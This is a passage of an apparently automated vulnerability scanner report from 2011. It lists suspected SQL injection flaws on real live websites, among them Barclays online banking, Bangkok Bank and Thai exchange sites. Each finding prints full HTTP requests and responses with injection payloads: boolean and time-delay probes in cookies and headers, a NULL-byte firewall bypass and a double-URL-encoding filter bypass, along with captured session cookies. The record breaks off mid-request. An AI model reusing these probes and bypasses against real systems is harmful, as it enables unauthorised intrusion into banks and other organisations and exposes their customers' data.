1.3. http://group.barclays.com/html_phase_2/assets/scripts/scripts.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://group.barclays.com
Path:   /html_phase_2/assets/scripts/scripts.min.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /html_phase_2/assets'/scripts/scripts.min.js HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 03 May 2011 13:16:57 GMT
Set-Cookie: JSESSIONID=D56D3BD784E0F6B00405F984F691332D.tomcat_2_1; Path=/cs
Content-Type: text/html;charset=UTF-8
Content-Length: 1060
Connection: close

<html><head><title>Apache Tomcat/6.0.32 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /html_phase_2/assets''/scripts/scripts.min.js HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:16:57 GMT
Set-Cookie: JSESSIONID=2E80AD84529825C357C813F48EA52886.tomcat_2_1; Path=/cs
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 13:16:57 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 21260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb"
...[SNIP]...

1.4. http://html.aggregateknowledge.com/iframe [itemid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://html.aggregateknowledge.com
Path:   /iframe

Issue detail

The itemid parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the itemid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /iframe?pid=32&itemid=298028%00'&senduuid=0&che=1304429183 HTTP/1.1
Host: html.aggregateknowledge.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 03 May 2011 13:33:20 GMT
Connection: close


<!--
An Aggregate Knowledge internal error occurred; Unable to service request.
org.springframework.dao.DataIntegrityViolationException: SqlMapClient operation; SQL [];
--- The error occur
...[SNIP]...
commender/ItemDao.xml.
--- The error occurred while applying a parameter map.
--- Check the Item.findByCustomerItemId-InlineParameterMap.
--- Check the statement (query failed).
--- Cause: org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding "UTF8": 0x00; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException:
--- The error occurred in mapping/recommender/It
...[SNIP]...

1.5. https://ibank.barclays.co.uk/olb/w/IndividualSavingsAcctOverview.do [JSESSIONID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/IndividualSavingsAcctOverview.do

Issue detail

The JSESSIONID cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the JSESSIONID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /olb/w/IndividualSavingsAcctOverview.do HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06'%20and%201%3d1--%20; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=640359596.32800.0000; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:55:27 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06'%20and%201%3d1--%20:r4ap-RolbClusterB-server04; Path=/; Secure
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:55:27 GMT; Path=/
Connection: close
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Login
Step 1 of 2

    </title>











<meta name="Description" content="Log-in to Barclays Online Banking to keep track of your money day and night. Check statements, pay bills, move money. It's convenient, easy and secure." />









<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />









<scr
...[SNIP]...

Request 2

GET /olb/w/IndividualSavingsAcctOverview.do HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06'%20and%201%3d2--%20; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=640359596.32800.0000; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:55:28 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:55:27 GMT; Path=/
Connection: close
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Login
Step 1 of 2

    </title>











<meta name="Description" content="Log-in to Barclays Online Banking to keep track of your money day and night. Check statements, pay bills, move money. It's convenient, easy and secure." />









<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />









<script src="/w/glo/js/jquery-1.3.2.min.js" type="text/javascript"></script>




<meta name="WT.cg_s" content="logon - Login" />
<
...[SNIP]...

1.6. http://moneytalk.scb.co.th/index.asp [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://moneytalk.scb.co.th
Path:   /index.asp

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be IBM DB2.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.asp?FileName=TH HTTP/1.1
Host: moneytalk.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=')waitfor%20delay'0%3a0%3a20'--

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2011 13:26:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 764
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQTQRTAB=HMOJLEJDAIANBDHNMEMJPCJK; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- Check Parameter -->
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=
...[SNIP]...
<font face="Arial" size=2>[IBM][CLI Driver] SQL30081N A communication error has been detected. Communication protocol being used: &quot;TCP/IP&quot;. Communication API being used: &quot;SOCKETS&quot;. Location where the error was detected:
...[SNIP]...

1.7. http://moneytalk.scb.co.th/index.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://moneytalk.scb.co.th
Path:   /index.asp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be IBM DB2.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.asp?FileName=TH&1'=1 HTTP/1.1
Host: moneytalk.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2011 13:25:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 764
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQTQRTAB=EJOJLEJDNJCJDOIGAOKIKFEP; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- Check Parameter -->
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=
...[SNIP]...
<font face="Arial" size=2>[IBM][CLI Driver] SQL30081N A communication error has been detected. Communication protocol being used: &quot;TCP/IP&quot;. Communication API being used: &quot;SOCKETS&quot;. Location where the error was detected:
...[SNIP]...

Request 2

GET /index.asp?FileName=TH&1''=1 HTTP/1.1
Host: moneytalk.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 13:25:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 30024
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQTQRTAB=GJOJLEJDCDKMIAOJMAHBHFCC; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- Check Parameter -->


<!-- Check Parameter -->

<html>
<head>
<title>Welcome to Money Talk</title>
<meta http-equiv="C
...[SNIP]...

1.8. http://register2.set.or.th/semreg/detail.aspx [cs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://register2.set.or.th
Path:   /semreg/detail.aspx

Issue detail

The cs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cs parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /semreg/detail.aspx?ow=FKH&cs=S0001'&sn=0049 HTTP/1.1
Host: register2.set.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:34:12 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5061

<html>
<head>
<title>Line 1: Incorrect syntax near '0049'.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
   p {f
...[SNIP]...

Request 2

GET /semreg/detail.aspx?ow=FKH&cs=S0001''&sn=0049 HTTP/1.1
Host: register2.set.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:34:13 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=35wddb45hxabcz45p5svc555; path=/
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5901


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>detail</title>
       <meta content="True" name="vs_snapToGrid">
       <meta content="Microsoft Visual Studio .NET
...[SNIP]...

1.9. http://register2.set.or.th/semreg/detail.aspx [ow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://register2.set.or.th
Path:   /semreg/detail.aspx

Issue detail

The ow parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ow parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /semreg/detail.aspx?ow=FKH'&cs=S0001&sn=0049 HTTP/1.1
Host: register2.set.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:33:35 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5066

<html>
<head>
<title>Line 1: Incorrect syntax near 'S0001'.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
   p {
...[SNIP]...

Request 2

GET /semreg/detail.aspx?ow=FKH''&cs=S0001&sn=0049 HTTP/1.1
Host: register2.set.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:33:37 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=rw1thrzzedtfkcezq0vvrt2a; path=/
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5901


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>detail</title>
       <meta content="True" name="vs_snapToGrid">
       <meta content="Microsoft Visual Studio .NET
...[SNIP]...

1.10. http://register2.set.or.th/semreg/detail.aspx [sn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://register2.set.or.th
Path:   /semreg/detail.aspx

Issue detail

The sn parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sn parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /semreg/detail.aspx?ow=FKH&cs=S0001&sn=0049' HTTP/1.1
Host: register2.set.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:34:49 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5181

<html>
<head>
<title>Unclosed quotation mark before the character string '0049' '.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color
...[SNIP]...

Request 2

GET /semreg/detail.aspx?ow=FKH&cs=S0001&sn=0049'' HTTP/1.1
Host: register2.set.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:34:50 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=p1nezdnp0qxygzii5le4dr45; path=/
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5901


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>detail</title>
       <meta content="True" name="vs_snapToGrid">
       <meta content="Microsoft Visual Studio .NET
...[SNIP]...

1.11. http://www.360travelguide.com/results.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.360travelguide.com
Path:   /results.asp

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /results.asp HTTP/1.1
Host: www.360travelguide.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',0,0,0)waitfor%20delay'0%3a0%3a20'--
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 03 May 2011 13:36:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.360travelguide.com/
Content-Length: 26251
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCDCCARR=CGOGAIKDIKOCGAFHKMKMPGAD; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<met
...[SNIP]...
<img src='http://cache.graphicslib.viator.com/graphicslib/thumbs75/2830/SITours/bora-bora-snorkel-sharkfeeding-and-lagoonarium-full-day-tour-in-bora-bora-1.jpg' width='100px' align=left hspace='3'>
...[SNIP]...

1.12. http://www.bangkokbank.com/Online%20Banking/For%20Personal/iBanking/Pages/Forms/AllItems.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bangkokbank.com
Path:   /Online%20Banking/For%20Personal/iBanking/Pages/Forms/AllItems.aspx

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Online%20Banking/For%20Personal/iBanking%2527/Pages/Forms/AllItems.aspx HTTP/1.1
Host: www.bangkokbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cbclose7180=1; verify=test; _cbclose=1; _ctout7180=1; ASPSESSIONIDCQDDQRCA=CDNLAAIDONLFLNJJKKMMJIGB; _uid7180=55ED3A63.1; ASPSESSIONIDCADTTCQT=HJBJCGIDKBNEBONIDMFMOFBD; visit_time=1591;

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 191605
Content-Type: text/html; charset=utf-8
Expires: Mon, 18 Apr 2011 13:43:24 GMT
Last-Modified: Tue, 03 May 2011 13:43:24 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:43:24 GMT
Age: 0
Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir="ltr">
<HE
...[SNIP]...
<!-- Use %=TitltName% (Scrip less)technic because Share Point Design is automatic create don't want attribute and page occor error.-->
...[SNIP]...

Request 2

GET /Online%20Banking/For%20Personal/iBanking%2527%2527/Pages/Forms/AllItems.aspx HTTP/1.1
Host: www.bangkokbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cbclose7180=1; verify=test; _cbclose=1; _ctout7180=1; ASPSESSIONIDCQDDQRCA=CDNLAAIDONLFLNJJKKMMJIGB; _uid7180=55ED3A63.1; ASPSESSIONIDCADTTCQT=HJBJCGIDKBNEBONIDMFMOFBD; visit_time=1591;

Response 2

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 08 Aug 2009 19:47:17 GMT
Accept-Ranges: bytes
ETag: "8f2afb86118ca1:0"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:43:28 GMT
Content-Length: 0
Age: 0
Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])


1.13. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bangkokbank.com
Path:   /_layouts/NR/JavaScript/truehitsstat.asp

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /_layouts/NR/JavaScript/truehitsstat.asp%2527 HTTP/1.1
Host: www.bangkokbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cbclose7180=1; verify=test; _cbclose=1; _ctout7180=1; ASPSESSIONIDCQDDQRCA=CDNLAAIDONLFLNJJKKMMJIGB; _uid7180=55ED3A63.1; ASPSESSIONIDCADTTCQT=HJBJCGIDKBNEBONIDMFMOFBD; visit_time=1591;

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 191605
Content-Type: text/html; charset=utf-8
Expires: Mon, 18 Apr 2011 13:43:07 GMT
Last-Modified: Tue, 03 May 2011 13:43:07 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:43:07 GMT
Age: 0
Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir="ltr">
<HE
...[SNIP]...
<!-- Use %=TitltName% (Scrip less)technic because Share Point Design is automatic create don't want attribute and page occor error.-->
...[SNIP]...

Request 2

GET /_layouts/NR/JavaScript/truehitsstat.asp%2527%2527 HTTP/1.1
Host: www.bangkokbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cbclose7180=1; verify=test; _cbclose=1; _ctout7180=1; ASPSESSIONIDCQDDQRCA=CDNLAAIDONLFLNJJKKMMJIGB; _uid7180=55ED3A63.1; ASPSESSIONIDCADTTCQT=HJBJCGIDKBNEBONIDMFMOFBD; visit_time=1591;

Response 2

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 08 Aug 2009 19:47:17 GMT
Accept-Ranges: bytes
ETag: "8f2afb86118ca1:0"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:43:10 GMT
Content-Length: 0
Age: 0
Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])


1.14. http://www.scriptlogic.com/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.scriptlogic.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
